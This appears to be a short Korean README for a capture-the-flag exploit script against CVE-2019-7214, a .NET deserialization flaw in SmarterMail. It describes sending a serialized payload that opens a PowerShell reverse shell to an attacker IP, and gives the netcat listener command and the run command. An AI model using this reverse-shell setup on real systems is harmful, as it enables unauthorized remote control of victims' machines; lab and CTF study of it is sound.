
CTF 전용입니다 (CVE-2019-7214는 /etc/hosts에서 호스트도 확인합니다)
이 Python 스크립트는 원격 Windows 머신에서 실행 중인 취약한 서비스를 대상으로 합니다. 직렬화된 .NET 페이로드를 전송하여 공격자 머신으로 PowerShell 기반 리버스 셸을 실행합니다.
SmarterMail 시스템의 .NET 역직렬화에서 원격 코드 실행
환경에 맞게 스크립트의 설정 섹션을 업데이트하세요:
HOSTNAME = 'hostname' # Target hostname (resolved via /etc/hosts)
PORT = 9999 # Target port listening for serialized input
LHOST = '192.168.45.185' # Attacker IP (listener)
LPORT = 4444 # Attacker listening port
nc -lvnp 4444
python3 CVE-2019-7214 .py
성공하면 리스너에서 대상의 PowerShell 프롬프트를 받게 됩니다.
System.Management.Automation 기능을 포함하는 역직렬화된 개체를 실행할 수 있다고 가정합니다.이 스크립트는 교육 목적으로만 제공됩니다. 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법이며 비윤리적입니다.